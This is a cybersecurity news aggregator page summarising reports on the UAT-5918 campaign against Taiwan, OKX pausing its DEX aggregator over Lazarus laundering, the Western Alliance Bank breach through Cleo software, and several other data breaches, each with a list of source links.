  • thehackernews.com: UAT-5918 Targets Taiwan's Critical Infrastructure Using Web Shells and Open-Source Tools
  • Talkback Resources: UAT-5918 Targets Taiwan's Critical Infrastructure Using Web Shells and Open-Source Tools [ics] [net]
  • Cyber Security News: UAT-5918 Threat Actors Target Exposed Web and Application Servers via N-Day Vulnerabilities
  • gbhackers.com: UAT-5918 Hackers Exploit N-Day Vulnerabilities in Exposed Web and Application Servers
  • The DefendOps Diaries: UAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft, uses a combination of web shells and open-sourced tooling to conduct post-compromise activities to establish persistence in victim environments for information theft and credential harvesting.
  • securityaffairs.com: UAT-5918 ATP group targets critical Taiwan
  • www.scworld.com: UAT-5918, a threat actor believed to be motivated by establishing long-term access for information theft, uses a combination of web shells and open-sourced tooling to conduct post-compromise activities to establish persistence in victim systems.
  • Virus Bulletin: Cisco Talos researchers Jung soo An, Asheer Malhotra, Brandon White & Vitor Ventura analyse a UAT-5918 malicious campaign targeting critical infrastructure entities in Taiwan.

Bill Toulas@BleepingComputer //
OKX Web3 has suspended its DEX aggregator services following reports of abuse by the North Korean Lazarus hackers. The Lazarus Group, known for conducting a $1.5 billion crypto heist, triggered this action. The suspension is aimed at implementing security upgrades to prevent further abuse and protect users from illicit activities like money laundering.

OKX's response includes implementing advanced security technologies, such as multi-factor authentication and machine learning algorithms, to predict and prevent potential security breaches. The company is also collaborating with regulatory authorities to align its security measures with international standards, including stricter Know Your Customer protocols and enhanced transaction monitoring systems. These steps are part of a comprehensive security overhaul aimed at fortifying the platform against sophisticated cyber threats.

Recommended read:
References :
  • bsky.app: Bsky Social - OKX Web3 has decided to suspend its DEX aggregator services to implement security upgrades following reports of abuse by the notorious North Korean Lazarus hackers, who recently conducted a $1.5 billion crypto heist.
  • BleepingComputer: Infosec Exchange - OKX Web3 has decided to suspend its DEX aggregator services to implement security upgrades following reports of abuse by the notorious North Korean Lazarus hackers, who recently conducted a $1.5 billion crypto heist.
  • BleepingComputer: BleepingComputer - OKX suspends DEX aggregator after Lazarus hackers try to launder funds
  • The DefendOps Diaries: OKX's Strategic Response to Cyber Threats: A Comprehensive Security Overhaul
  • bsky.app: OKX Web3 has decided to suspend its DEX aggregator services to implement security upgrades following reports of abuse by the notorious North Korean Lazarus hackers, who recently conducted a $1.5 billion crypto heist.
  • bsky.app: OKX Web3 has decided to suspend its DEX aggregator services to implement security upgrades following reports of abuse by the notorious North Korean Lazarus hackers, who recently conducted a $1.5 billion crypto heist.
  • securityonline.info: Web3 Laundering Fears: OKX Suspends Platform Amidst Scrutiny
  • www.scworld.com: OKX tool leveraged by Lazarus Group briefly taken down

Aninda Chakraborty@Tech Monitor //
Western Alliance Bank recently disclosed a data breach impacting 21,899 customers. The incident stemmed from a vulnerability in third-party secure file transfer software, highlighting the risks associated with relying on external vendors for critical operations. Attackers exploited a zero-day vulnerability to exfiltrate sensitive files from the bank's systems, prompting an internal investigation after stolen files were leaked online. The breach occurred between October 12 and October 24 of the previous year, but the vulnerability wasn't disclosed by the vendor until October 27, highlighting the time it can take to discover these issues.

The compromised data included names, Social Security numbers, dates of birth, financial account details, driver’s license numbers, tax identification numbers, and even passport information in some cases. The Clop ransomware gang has been attributed to the breach, adding Western Alliance Bank to its leak site after exploiting vulnerabilities in Cleo Harmony and related software. The bank is offering affected customers one year of credit monitoring as a precaution, while urging heightened vigilance for potential identity theft and fraud.

Recommended read:
References :
  • bsky.app: Arizona-based Western Alliance Bank is notifying nearly 22,000 customers their personal information was stolen in October after a third-party vendor's secure file transfer software was breached.
  • Secure Bulletin: Western Alliance Bank data breach: 21,899 customers impacted
  • The DefendOps Diaries: Understanding the Western Alliance Bank Data Breach: Lessons in Cybersecurity
  • BleepingComputer: Western Alliance Bank notifies 21,899 customers of data breach
  • Tech Monitor: Western Alliance Bank confirms data breach affecting over 21,000 customers
  • BleepingComputer: Arizona-based Western Alliance Bank is notifying nearly 22,000 customers their personal information was stolen in October after a third-party vendor's secure file transfer software was breached.
  • Information Security Buzz: Western Alliance Bank has announced a data breach affecting 21,899 people, that was caused by an October 2024 cyberattack on a third-party file transfer software.
  • www.itpro.com: Western Alliance Bank admits cyber attack exposed 22,000 customers

Dissent@DataBreaches.Net //
Recent data breaches have affected multiple organizations, exposing sensitive information and highlighting the importance of robust security measures. SOCRadar's Dark Web Team has uncovered several significant threats, including a breach at AUTOSUR, a French vehicle inspection company, where approximately 10.7 million customer records were leaked. The exposed data includes customer names, emails, phone numbers, hashed passwords, home addresses, vehicle information, and license plate numbers. This breach poses significant risks such as identity theft, phishing attacks, and financial fraud.

Unauthorized access to shipping portals associated with Lenovo and HP has also been detected, targeting shipment tracking activities in India. This breach could expose sensitive supply chain information. Furthermore, cybercriminals are actively exploiting the gaming and entertainment sectors, utilizing tools such as a Disney+ credential checker and exploiting a leaked FiveM database. A massive dataset of crypto and forex leads is also up for sale, creating risks of fraud and financial scams. Additionally, Cardiovascular Consultants Ltd. (CVC) in Arizona experienced a ransomware attack, impacting 484,000 patients, with data later appearing on a clear net IP address associated with “WikiLeaksV2." The breach at Sunflower and CCA impacted 220,968 individuals according to a filing with the Maine Attorney General's Office.

Recommended read:
References :
  • socradar.io: AUTOSUR Breach, FiveM Database Leak, Disney+ Account Checker, Crypto Leads & Forex Scams Exposed
  • www.cysecurity.news: Sunflower and CCA Suffer Data Breaches, Exposing Hundreds of Thousands of Records
  • Security - Troy Hunt: Inside the "3 Billion People" National Public Data Breach
  • securityaffairs.com: California Cryobank, the largest US sperm bank, disclosed a data breach
  • MSSP feed for Latest: Data Breach Hits California Cryobank
  • infosec.exchange: Okay, this is not good: "Executive Summary On 21 March 2025, CloudSEK’s XVigil discovered a threat actor, "rose87168," selling 6M records exfiltrated from SSO and LDAP of Oracle Cloud. The data includes JKS files, encrypted SSO passwords, key files, and enterprise manager JPS keys."
  • research.kudelskisecurity.com: Oracle Cloud SSO, LDAP Records Dumped, 140k+ Tenants Affected